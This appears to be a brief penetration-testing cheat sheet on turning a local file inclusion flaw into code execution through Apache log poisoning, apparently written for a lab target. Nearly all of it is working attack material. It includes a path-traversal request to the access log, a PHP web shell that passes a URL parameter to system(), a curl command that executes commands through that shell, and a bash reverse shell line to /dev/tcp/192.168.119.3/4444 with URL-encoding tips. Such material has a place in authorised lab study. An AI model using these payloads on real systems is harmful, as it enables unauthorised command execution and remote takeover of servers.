File Inclusion Vulnerability
Log poisoning



Last updated



Last updated
# Confirm that you can access the log file.
curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log
# Look at the details that is being captured in log file.
# Replace below file with command if it is php file
<?php echo system($_GET['cmd']); ?>
# You can run command in below way:
# you can use burp suite as it easy and handy, I am showing with curl command.
curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log&cmd=ps
# You can get reverse shell using below command:
bash -c "bash -i >& /dev/tcp/192.168.119.3/4444 0>&1"
# URL Encode it before running.
# In burp suite select the reverse shell command and press CTRL + u to URL encode it.